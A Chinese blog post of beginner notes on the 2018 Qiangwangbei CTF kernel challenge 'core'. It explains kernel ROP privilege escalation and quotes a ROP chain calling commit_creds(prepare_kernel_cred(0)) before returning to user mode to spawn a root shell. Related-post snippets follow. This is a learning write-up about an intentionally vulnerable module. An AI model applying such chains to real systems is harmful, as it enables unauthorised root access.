kernel ROP - 2018 强网杯 - core

已于 2022-05-09 19:48:32 修改
阅读量180 收藏 1
点赞数
分类专栏: pwn 新手 ctf 文章标签: 安全 linux python
于 2022-05-09 19:48:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51687381/article/details/124607626
版权
新手 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
ctf
15 篇文章 0 订阅
订阅专栏
pwn
11 篇文章 0 订阅
订阅专栏

初学kernel,做个笔记。

Kernel ROP - CTF Wiki

wiki上有着详细的分析,这里只对一些wiki上没有讲到的做个笔记。

首先是对文件:

引用一句其他师傅的话:类比于libc中的pwn,感觉*.ko就是binary文件,vmlinux就是libc … 不同的是保护机制是由如何启动决定的(start.sh 中修改)。

Rop大体思路:

栈上有Canary防护的话,需要先泄露出Canary,来促使Rop

Rop具体思路是和Libc中的类似,利用一些寄存器进行传值

调用commit_creds(prepare_kernel_cred(0))来提权

最后回到用户态就可以system('bin/sh')

思路是很好想的,但是具体是shellcode的写法。

我们ropper出来的gadget中一部分是不能用的,而且也不是每次都能找到完美适合的gadget,这就比较考验我们写shellcode的功底。

拿wiki上的shellcode来分析

rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret
    rop[i++] = 0;
    rop[i++] = prepare_kernel_cred;         // prepare_kernel_cred(0)

    rop[i++] = 0xffffffff810a0f49 + offset; // pop rdx; ret
    rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret
    rop[i++] = 0xffffffff8101aa6a + offset; // mov rdi, rax; call rdx; 
    rop[i++] = commit_creds;

    rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret
    rop[i++] = 0;

    rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret; 

    rop[i++] = (size_t)spawn_shell;         // rip 

    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;

并且因为执行了mov rdi ,rax(rax一般作为返回值寄存器)rdi作为参数传递。然后swapgs 恢复寄存器的值,再用iretq 跳回用户态,这样就利用.ko文件的漏洞当前这个进程提权了,再进行system('bin/sh')就ok了

这部分的栈操作我分析了半个小时,原因是把call指令记错了。call 指令会先把当前的rip压入栈中,然后在进行jmp。这样在call rdx ,rdx再去执行pop rcx ;ret;时,ret就可以执行commit_creds 。如果 没有push操作,就会把commit_creds pop给了rcx,产生错误的理解。

Hush^
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
强网杯 2018 core ROP做法
weixin_46483787的博客
04-13 511
kernel的第二天,仍然很不想学····· 拿到题目看下init先: #!/bin/sh mount -t proc proc /proc mount -t sysfs sysfs /sys mount -t devtmpfs none /dev /sbin/mdev -s mkdir -p /dev/pts mount -vt devpts -o gid=4,mode=620 none /dev/pts chmod 666 /dev/ptmx cat /proc/kallsyms > /tmp/
kernel-ROP 2018 强网杯 - core
qq_41071646的博客
07-13 1326
参考链接 CTF wiki https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_rop-zh/ 说实话 看见强网杯 这三个字 我笑了 2019年的那些pwn 题 真的多 不当人 当时因为我再看 逆向所以 pwn 就负责人一个人 比较难受 暑假多学一些pwn 能够分担pwn 压力吧 然后今天看了一下 k...
强网杯2018_core
z1r0的博客
03-21 839
强网杯2018_core 具体可以看z1r0’s blog 题目拿到手就是一个tar包。解压 ➜ 2018强网杯-core tar -xvf core_give.tar give_to_player/ give_to_player/bzImage give_to_player/core.cpio give_to_player/start.sh give_to_player/vmlinux2018强网杯-core ls core_give.tar give_to_player ➜ 2018强网
linux_kernal_pwn 2018 强网杯 - core
yongbaoii的博客
09-01 305
四个文件,vmlinux不用提取了。 开了kaslr。 我们说内核的保护分四种,隔离、访问控制、异常检测、随机化。 随机化有两种,一个是kaslr,一个是fgkaslr。 在开启了 KASLR 的内核中,内核的代码段基地址等地址会整体偏移。 然后解压文件系统,看看init文件相关配置。 mkdir core cp core.cpio ./core cd core mv ./core.cpio core.cpio.gz #因为cpio是经过gzip压缩过的,必须更改名字,gunzip才认识 gu.
2018强网杯
aoque9909的博客
04-01 288
先占个楼 看着writeup慢慢学吧。。 转载于:https://www.cnblogs.com/ZHijack/p/8659885.html
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
Rop-Fast:快速跳动
06-25
**Rop-Fast:快速构建RESTful服务的框架** Rop-Fast是一个专门设计用于快速构建REST风格服务的框架,其根源在于Rop( Responsibility-Oriented Programming)框架。Rop框架强调职责导向编程,旨在提高代码的可读性...
rop-plus:rop框架修改加强版
06-28
**ROP技术概述** ROP(Return-Oriented Programming)是一种高级的代码注入技术,它利用程序内存中的小片段(也称为“gadgets”)来构造一个功能完整的恶意代码序列,而不是试图插入新的代码。ROP在现代操作系统中...
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
adobe-rop-webapp
05-25
school_adobe 更改照片: #### main.js在main.js ,需要更改两个数组: att_arr和IMAGES 。 att_arr保留为每张照片显示的字幕-摄影师的名字后应带有© 如果可以的话,接下来可以是一年。 例如: "Photographer...
强网杯 2018 core ret2user做法
weixin_46483787的博客
04-13 1450
关于题目的具体分析移步 强网杯 2018 core ROP做法 这里就只介绍ret2user这种做法,不再对题目进行具体分析。 这个题没有smep,所以可以直接在内核态执行用户态的代码,所以我们可以自己写一个执行commit_creds(prepare_kernel_cred(0))的函数,然后修改返回地址到那个函数,之后再进入用户态执行system(/bin/sh\x00)来起shell,省去了找gadget编写rop的过程 exp: #include <stdio.h> #include &
Kernel rop attack 2018QWBcore复现
qq_39948058的博客
08-28 297
前言:最近刚入手内核题,所以这里跟着ctfwiki进行学习下,大佬勿喷。。。 第一步很经典。。。如果题目没有给 vmlinux,可以通过 extract-vmlinux 提取。 看到start.sh发现开启了kalsr随机化,需要进行泄露计算基地址,这里跟用户态pwn题很相似 看下init: #!/bin/sh mount -t proc proc /proc mount -t sysfs sysfs /sys mount -t devtmpfs none /dev /sbin/mdev -s m
2018强网杯之silent2
极目楚天舒的博客
04-23 635
0x01分析行为按照正常思路添加、编辑、释放Add函数分配大小为16字节或大于0x7f字节的堆块,将堆地址放入0x6020c0的bss段内。Free函数释放堆块,但是没有将指针清零,导致doublefree。Edit函数修改堆块内容,修改长度不超过原来的长度。0x02利用点checksec检查发现可以对got表进行写,很自然联想到用system函数地址覆盖strlen_got_plt,这样当调用E...
kernel pwn】(贰)kernel ROP
weixin_43960998的博客
03-19 378
继续学习 kernel pwn 相关知识,同时记录一些方法。 本文以 QWB2018-core 为例 1.题前准备 解压等一套流程。先看一下 start.sh (修改后): qemu-system-x86_64 \ -m 128M \ -kernel ./bzImage \ -initrd ./core.cpio \ -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr" \ -netdev user,id=t0, -
Kernel pwn 基础教学之 Kernel ROP
蚁景网安学院
01-28 2506
点击"蓝字"关注,获取更多技术内容!前言Kernel ROP本质上还是构造ropchain来控制程序流程完成提权,不过相较于用户态来说还是有了一些变化,这里选取的例题是2018强网杯的赛...
linux kernel pwn学习之ROP
seaaseesa的博客
02-29 1235
Linux Kernel ROP Linux kernel rop根glibc下的ROP思路是差不多的,当我们学习掌握了glibc下的ROP,再来看kernelROP攻击,就很容易理解了。 与用户态同样的是,内核有也类似于PIE的机制,加kaslr,在启动系统时的脚本里可以指定开启或关闭kaslr。 qemu-system-x86_64\ -m256M\ -kernel...
linux内核rop姿势详解,linux kernel rop
weixin_36137385的博客
05-02 403
Introduction学习 liunx 内核漏洞利用 rop 技术,练习一下内核 rop 链的构造到执行来完成普通用户权限提升。在一般的 ret2usr 攻击中,内核的控制流会被重定向到用户空间中包含权限提升代码的地址处:void __attribute__((regparm(3))) payload() {commit_creds(prepare_kernel_cred(0);}执行上面的代码...
2018强网杯初赛 逆向题目 hide writeup (超详细)
风如激的博客
03-28 3935
这道题有壳,strings搜索是upx3.91。但是不能用upx -d。只好手动脱壳了。难点在于本题目有反调试,有些函数不能步过。首先研究壳。第一句call必须步入。Sub_44f1c5必须步入。 Sub_44F1C5中,0x44f214的rep指令把0x400000到0x44f248复制到0x800000位置。0x44f22c处,rbp是0x84efb5。这句话是start处的第二条指令。这里不...
2023 强网杯 Writeup
最新发布
01-29
"这篇Writeup主要涵盖了2023年强网杯网络安全竞赛中的多个挑战,包括Misc、Crypto、Reverse、PWN和Web等领域的题目。作者Nu1L分享了解题思路和解决方案,帮助读者理解比赛中的技术难点和知识点。" 在Misc类题目中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值